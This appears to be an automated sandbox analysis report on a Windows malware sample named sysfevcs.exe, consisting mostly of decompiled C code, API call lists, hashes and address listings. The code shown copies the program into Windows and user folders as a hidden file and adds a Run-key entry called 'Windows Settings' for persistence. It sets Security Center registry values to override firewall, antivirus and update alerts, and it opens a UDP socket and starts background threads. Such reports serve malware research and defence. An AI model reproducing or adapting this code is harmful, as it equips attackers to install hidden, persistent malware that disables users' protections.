                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t27 = __edi;
                                                                                                                                                                                                                                                                  				_t24 = E00408820(0x24);
                                                                                                                                                                                                                                                                  				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                  				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 2, 0x11); // executed
                                                                                                                                                                                                                                                                  				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                  				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					E0040DA20(_t24, __edi);
                                                                                                                                                                                                                                                                  					_t24 = 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                                                                                                                                  					L6:
                                                                                                                                                                                                                                                                  					return _t24;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10); // executed
                                                                                                                                                                                                                                                                  					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                                                                                                                                                                                                  						_t20 = CreateThread(0, 0, E0040D7F0, _t24, 0, 0); // executed
                                                                                                                                                                                                                                                                  						 *(_t24 + 0x14) = _t20;
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E0040DA20(_t24, _t27);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}













                                                                                                                                                                                                                                                                  0x0040da90
                                                                                                                                                                                                                                                                  0x0040daa2
                                                                                                                                                                                                                                                                  0x0040daa8
                                                                                                                                                                                                                                                                  0x0040daae
                                                                                                                                                                                                                                                                  0x0040dab5
                                                                                                                                                                                                                                                                  0x0040dac1
                                                                                                                                                                                                                                                                  0x0040dac4
                                                                                                                                                                                                                                                                  0x0040daca
                                                                                                                                                                                                                                                                  0x0040dad0
                                                                                                                                                                                                                                                                  0x0040dad2
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dadb
                                                                                                                                                                                                                                                                  0x0040db3a
                                                                                                                                                                                                                                                                  0x0040db40
                                                                                                                                                                                                                                                                  0x0040dadd
                                                                                                                                                                                                                                                                  0x0040dadf
                                                                                                                                                                                                                                                                  0x0040dae3
                                                                                                                                                                                                                                                                  0x0040dae7
                                                                                                                                                                                                                                                                  0x0040daeb
                                                                                                                                                                                                                                                                  0x0040dafb
                                                                                                                                                                                                                                                                  0x0040db05
                                                                                                                                                                                                                                                                  0x0040db0e
                                                                                                                                                                                                                                                                  0x0040db2e
                                                                                                                                                                                                                                                                  0x0040db31
                                                                                                                                                                                                                                                                  0x0040db37
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db0e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BC3E,00000000), ref: 0040DAB5
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DAC4
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040DB05
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,00009E34,0040D68D), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE ref: 0040DB31
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                  • Opcode ID: c3bbe95c30042d0b882465ac9fcf9e1e5dbf01f613ae2f2be8356edd02a04266
                                                                                                                                                                                                                                                                  • Instruction ID: 5276f6ad8d77c11c83a369dc1e5a02b163374df96baf18b758578e552dca49b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3bbe95c30042d0b882465ac9fcf9e1e5dbf01f613ae2f2be8356edd02a04266
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54119874B44300AFE7109FB48C86B5776A0EF04714F508579FA58EA2D2D2B5D4088B5A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 405b40-405b5e Sleep 1 405b68-405b74 0->1 2 405b76-405b83 PathFileExistsW 1->2 3 405bbc-405bdc CreateMutexA GetLastError 1->3 6 405b85-405ba5 DeleteFileW DeleteFileA MoveFileA 2->6 7 405bab-405bba 2->7 4 405be6-405c6b GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->4 5 405bde-405be0 ExitProcess 3->5 8 405c71-405c8a 4->8 6->7 7->1 9 405cd7-405cdc 8->9 10 405c8c-405c94 8->10 13 405ce2-405cf5 9->13 11 405c96-405cb1 10->11 12 405ccb-405cd5 10->12 11->9 14 405cb3-405cc9 11->14 12->13 15 405cfb-405d06 call 40ce10 13->15 16 405f5e-405f89 Sleep RegOpenKeyExA 13->16 14->8 14->12 24 405d10-405d5e ExpandEnvironmentStringsW wsprintfW CopyFileW 15->24 25 405d08-405d0a ExitProcess 15->25 17 406075-406095 RegOpenKeyExA 16->17 18 405f8f-40606f RegSetValueExA * 7 RegCloseKey 16->18 20 406181-406196 Sleep call 40aee0 17->20 21 40609b-40617b RegSetValueExA * 7 RegCloseKey 17->21 18->17 31 4062ec-4062f5 20->31 32 40619c-4062e4 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404320 call 40cd40 call 4058d0 CreateEventA call 40a610 call 40b810 call 409a60 call 40b8c0 * 4 20->32 21->20 26 405d64-405d93 SetFileAttributesW RegOpenKeyExW 24->26 27 405e3d-405e7f Sleep wsprintfW CopyFileW 24->27 29 405d99-405dae 26->29 30 405e1e-405e33 call 40d0b0 26->30 27->16 33 405e85-405eb4 SetFileAttributesW RegOpenKeyExW 27->33 34 405db4-405dd3 29->34 30->27 46 405e35-405e37 ExitProcess 30->46 67 4062e9 32->67 37 405eba-405ecf 33->37 38 405f3f-405f54 call 40d0b0 33->38 34->34 40 405dd5-405e18 RegSetValueExW RegCloseKey 34->40 43 405ed5-405ef4 37->43 38->16 50 405f56-405f58 ExitProcess 38->50 40->30 43->43 48 405ef6-405f39 RegSetValueExW RegCloseKey 43->48 48->38 67->31
                                                                                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                                                                                  			_entry_() {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				char _v528;
                                                                                                                                                                                                                                                                  				int _v532;
                                                                                                                                                                                                                                                                  				int _v536;
                                                                                                                                                                                                                                                                  				char _v1060;
                                                                                                                                                                                                                                                                  				void* _v1064;
                                                                                                                                                                                                                                                                  				char _v1588;
                                                                                                                                                                                                                                                                  				short _v2108;
                                                                                                                                                                                                                                                                  				intOrPtr _v2112;
                                                                                                                                                                                                                                                                  				short _v2636;
                                                                                                                                                                                                                                                                  				void* _v2640;
                                                                                                                                                                                                                                                                  				char _v3044;
                                                                                                                                                                                                                                                                  				char _v3048;
                                                                                                                                                                                                                                                                  				int _v3052;
                                                                                                                                                                                                                                                                  				short _v3054;
                                                                                                                                                                                                                                                                  				short _v3056;
                                                                                                                                                                                                                                                                  				int _v3060;
                                                                                                                                                                                                                                                                  				int _v3064;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3068;
                                                                                                                                                                                                                                                                  				intOrPtr _v3072;
                                                                                                                                                                                                                                                                  				short _v3074;
                                                                                                                                                                                                                                                                  				signed int _v3080;
                                                                                                                                                                                                                                                                  				intOrPtr* _v3084;
                                                                                                                                                                                                                                                                  				intOrPtr _v3088;
                                                                                                                                                                                                                                                                  				short _v3090;
                                                                                                                                                                                                                                                                  				signed int _v3096;
                                                                                                                                                                                                                                                                  				void* _t121;
                                                                                                                                                                                                                                                                  				int _t129;
                                                                                                                                                                                                                                                                  				long _t130;
                                                                                                                                                                                                                                                                  				long _t132;
                                                                                                                                                                                                                                                                  				signed char _t133;
                                                                                                                                                                                                                                                                  				void* _t142;
                                                                                                                                                                                                                                                                  				intOrPtr _t145;
                                                                                                                                                                                                                                                                  				intOrPtr _t149;
                                                                                                                                                                                                                                                                  				signed char _t192;
                                                                                                                                                                                                                                                                  				signed char _t203;
                                                                                                                                                                                                                                                                  				int _t210;
                                                                                                                                                                                                                                                                  				short _t215;
                                                                                                                                                                                                                                                                  				intOrPtr _t219;
                                                                                                                                                                                                                                                                  				short _t245;
                                                                                                                                                                                                                                                                  				intOrPtr _t253;
                                                                                                                                                                                                                                                                  				intOrPtr _t254;
                                                                                                                                                                                                                                                                  				void* _t278;
                                                                                                                                                                                                                                                                  				void* _t279;
                                                                                                                                                                                                                                                                  				void* _t286;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                                                                                                                  				_v2112 = 0x2382;
                                                                                                                                                                                                                                                                  				while(_v536 < _v2112) {
                                                                                                                                                                                                                                                                  					_t210 = PathFileExistsW(L"2596396235629365635"); // executed
                                                                                                                                                                                                                                                                  					if(_t210 != 0) {
                                                                                                                                                                                                                                                                  						DeleteFileW(L"246266396537");
                                                                                                                                                                                                                                                                  						DeleteFileA("2352338747374");
                                                                                                                                                                                                                                                                  						MoveFileA("2959359672365276", "2346836423674");
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v536 = _v536 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t121 = CreateMutexA(0, 0, "5858874"); // executed
                                                                                                                                                                                                                                                                  				_v2640 = _t121;
                                                                                                                                                                                                                                                                  				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                                                                  					_v1064 = 0;
                                                                                                                                                                                                                                                                  					_v528 = 1;
                                                                                                                                                                                                                                                                  					GetModuleFileNameW(0, "C:\Windows\sysfevcs.exe", 0x105);
                                                                                                                                                                                                                                                                  					_v532 = PathFindFileNameW("C:\Windows\sysfevcs.exe");
                                                                                                                                                                                                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Windows\sysfevcs.exe");
                                                                                                                                                                                                                                                                  					_t279 = _t278 + 0xc;
                                                                                                                                                                                                                                                                  					DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                                                                                                                                                                                                  					_v3048 = L"sysfevcs.exe";
                                                                                                                                                                                                                                                                  					_v3052 = _v532;
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t215 =  *_t129;
                                                                                                                                                                                                                                                                  						_v3054 = _t215;
                                                                                                                                                                                                                                                                  						_t19 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t215 !=  *((intOrPtr*)( *_t19))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						if(_v3054 == 0) {
                                                                                                                                                                                                                                                                  							L12:
                                                                                                                                                                                                                                                                  							_v3060 = 0;
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							_v3064 = _v3060;
                                                                                                                                                                                                                                                                  							if(_v3064 == 0) {
                                                                                                                                                                                                                                                                  								L31:
                                                                                                                                                                                                                                                                  								Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                  								_t130 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                  								if(_t130 == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064); // executed
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t132 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                  								if(_t132 == 0) {
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                                  								_t133 = E0040AEE0(); // executed
                                                                                                                                                                                                                                                                  								if((_t133 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  									__imp__#115(0x202,  &_v3044); // executed
                                                                                                                                                                                                                                                                  									wsprintfW("C:\Users\hardz\tbnds.dat", L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									wsprintfW("C:\Users\hardz\tbcmds.dat", L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00404120, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E004051D0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									Sleep(0x3e8);
                                                                                                                                                                                                                                                                  									CreateThread(0, 0, E00405A20, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									Sleep(0x2710); // executed
                                                                                                                                                                                                                                                                  									E00404320(); // executed
                                                                                                                                                                                                                                                                  									_t142 = E0040CD40(); // executed
                                                                                                                                                                                                                                                                  									E004058D0(_t142,  &_v2636); // executed
                                                                                                                                                                                                                                                                  									 *0x4139c4 = CreateEventA(0, 1, 0, 0); // executed
                                                                                                                                                                                                                                                                  									_t145 = E0040A610( &_v2636); // executed
                                                                                                                                                                                                                                                                  									 *0x4139cc = _t145;
                                                                                                                                                                                                                                                                  									 *0x4139c8 = E0040B810( &_v2636); // executed
                                                                                                                                                                                                                                                                  									E00409A60(); // executed
                                                                                                                                                                                                                                                                  									_t253 =  *0x4139c8; // 0x2220628
                                                                                                                                                                                                                                                                  									E0040B8C0(_t253, 0, E0040BCD0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									_t149 =  *0x4139c8; // 0x2220628
                                                                                                                                                                                                                                                                  									E0040B8C0(_t149, 0, E0040BC30, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									_t219 =  *0x4139c8; // 0x2220628
                                                                                                                                                                                                                                                                  									E0040B8C0(_t219, 0, E0040B7C0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  									_t254 =  *0x4139c8; // 0x2220628
                                                                                                                                                                                                                                                                  									E0040B8C0(_t254, 0, E0040B5C0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								return 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							if((E0040CE10() & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                  								if(CopyFileW(?str?,  &_v1588, 0) == 0) {
                                                                                                                                                                                                                                                                  									L24:
                                                                                                                                                                                                                                                                  									Sleep(0x1f4);
                                                                                                                                                                                                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"sysfevcs.exe");
                                                                                                                                                                                                                                                                  									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                  									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                  										goto L31;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                  										L29:
                                                                                                                                                                                                                                                                  										_t192 = E0040D0B0( &_v1060);
                                                                                                                                                                                                                                                                  										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                  										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  											goto L31;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                  									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                  										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                  									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                  									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                  									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  									goto L29;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                                                                                                                                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                  									L22:
                                                                                                                                                                                                                                                                  									_t203 = E0040D0B0( &_v1588);
                                                                                                                                                                                                                                                                  									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                  									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  										goto L24;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									ExitProcess(0);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                  								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                  									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                  								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                  								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2);
                                                                                                                                                                                                                                                                  								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                  								goto L22;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t129 = _v3052;
                                                                                                                                                                                                                                                                  						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                  						_v3056 = _t245;
                                                                                                                                                                                                                                                                  						_t24 =  &_v3048; // 0x412bec
                                                                                                                                                                                                                                                                  						if(_t245 !=  *((intOrPtr*)( *_t24 + 2))) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                  						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                  						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                  					_v3060 = _t129;
                                                                                                                                                                                                                                                                  					goto L14;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				ExitProcess(0);
                                                                                                                                                                                                                                                                  			}
















































                                                                                                                                                                                                                                                                  0x00405b4e
                                                                                                                                                                                                                                                                  0x00405b54
                                                                                                                                                                                                                                                                  0x00405b5e
                                                                                                                                                                                                                                                                  0x00405b68
                                                                                                                                                                                                                                                                  0x00405b7b
                                                                                                                                                                                                                                                                  0x00405b83
                                                                                                                                                                                                                                                                  0x00405b8a
                                                                                                                                                                                                                                                                  0x00405b95
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bb4
                                                                                                                                                                                                                                                                  0x00405bc5
                                                                                                                                                                                                                                                                  0x00405bcb
                                                                                                                                                                                                                                                                  0x00405bdc
                                                                                                                                                                                                                                                                  0x00405be6
                                                                                                                                                                                                                                                                  0x00405bf0
                                                                                                                                                                                                                                                                  0x00405c06
                                                                                                                                                                                                                                                                  0x00405c17
                                                                                                                                                                                                                                                                  0x00405c2e
                                                                                                                                                                                                                                                                  0x00405c34
                                                                                                                                                                                                                                                                  0x00405c3e
                                                                                                                                                                                                                                                                  0x00405c55
                                                                                                                                                                                                                                                                  0x00405c5b
                                                                                                                                                                                                                                                                  0x00405c6b
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c71
                                                                                                                                                                                                                                                                  0x00405c77
                                                                                                                                                                                                                                                                  0x00405c7a
                                                                                                                                                                                                                                                                  0x00405c81
                                                                                                                                                                                                                                                                  0x00405c8a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405c94
                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ccb
                                                                                                                                                                                                                                                                  0x00405ce2
                                                                                                                                                                                                                                                                  0x00405ce8
                                                                                                                                                                                                                                                                  0x00405cf5
                                                                                                                                                                                                                                                                  0x00405f5e
                                                                                                                                                                                                                                                                  0x00405f63
                                                                                                                                                                                                                                                                  0x00405f81
                                                                                                                                                                                                                                                                  0x00405f89
                                                                                                                                                                                                                                                                  0x00405fa8
                                                                                                                                                                                                                                                                  0x00405fc7
                                                                                                                                                                                                                                                                  0x00405fe6
                                                                                                                                                                                                                                                                  0x00406005
                                                                                                                                                                                                                                                                  0x00406024
                                                                                                                                                                                                                                                                  0x00406043
                                                                                                                                                                                                                                                                  0x00406062
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x0040606f
                                                                                                                                                                                                                                                                  0x0040608d
                                                                                                                                                                                                                                                                  0x00406095
                                                                                                                                                                                                                                                                  0x004060b4
                                                                                                                                                                                                                                                                  0x004060d3
                                                                                                                                                                                                                                                                  0x004060f2
                                                                                                                                                                                                                                                                  0x00406111
                                                                                                                                                                                                                                                                  0x00406130
                                                                                                                                                                                                                                                                  0x0040614f
                                                                                                                                                                                                                                                                  0x0040616e
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x0040617b
                                                                                                                                                                                                                                                                  0x00406186
                                                                                                                                                                                                                                                                  0x0040618c
                                                                                                                                                                                                                                                                  0x00406196
                                                                                                                                                                                                                                                                  0x004061a8
                                                                                                                                                                                                                                                                  0x004061bf
                                                                                                                                                                                                                                                                  0x004061d9
                                                                                                                                                                                                                                                                  0x004061f1
                                                                                                                                                                                                                                                                  0x004061fc
                                                                                                                                                                                                                                                                  0x00406211
                                                                                                                                                                                                                                                                  0x0040621c
                                                                                                                                                                                                                                                                  0x00406231
                                                                                                                                                                                                                                                                  0x0040623c
                                                                                                                                                                                                                                                                  0x00406242
                                                                                                                                                                                                                                                                  0x00406247
                                                                                                                                                                                                                                                                  0x0040624c
                                                                                                                                                                                                                                                                  0x0040625f
                                                                                                                                                                                                                                                                  0x00406264
                                                                                                                                                                                                                                                                  0x00406269
                                                                                                                                                                                                                                                                  0x00406273
                                                                                                                                                                                                                                                                  0x00406278
                                                                                                                                                                                                                                                                  0x0040628a
                                                                                                                                                                                                                                                                  0x00406291
                                                                                                                                                                                                                                                                  0x004062a6
                                                                                                                                                                                                                                                                  0x004062ac
                                                                                                                                                                                                                                                                  0x004062c1
                                                                                                                                                                                                                                                                  0x004062c8
                                                                                                                                                                                                                                                                  0x004062dd
                                                                                                                                                                                                                                                                  0x004062e4
                                                                                                                                                                                                                                                                  0x004062e9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004062f0
                                                                                                                                                                                                                                                                  0x00405d06
                                                                                                                                                                                                                                                                  0x00405d21
                                                                                                                                                                                                                                                                  0x00405d3f
                                                                                                                                                                                                                                                                  0x00405d45
                                                                                                                                                                                                                                                                  0x00405d5e
                                                                                                                                                                                                                                                                  0x00405e3d
                                                                                                                                                                                                                                                                  0x00405e42
                                                                                                                                                                                                                                                                  0x00405e60
                                                                                                                                                                                                                                                                  0x00405e66
                                                                                                                                                                                                                                                                  0x00405e7f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e8e
                                                                                                                                                                                                                                                                  0x00405eb4
                                                                                                                                                                                                                                                                  0x00405f3f
                                                                                                                                                                                                                                                                  0x00405f46
                                                                                                                                                                                                                                                                  0x00405f4b
                                                                                                                                                                                                                                                                  0x00405f54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405f58
                                                                                                                                                                                                                                                                  0x00405ec0
                                                                                                                                                                                                                                                                  0x00405ecf
                                                                                                                                                                                                                                                                  0x00405ed5
                                                                                                                                                                                                                                                                  0x00405ede
                                                                                                                                                                                                                                                                  0x00405ee5
                                                                                                                                                                                                                                                                  0x00405eec
                                                                                                                                                                                                                                                                  0x00405f04
                                                                                                                                                                                                                                                                  0x00405f2c
                                                                                                                                                                                                                                                                  0x00405f39
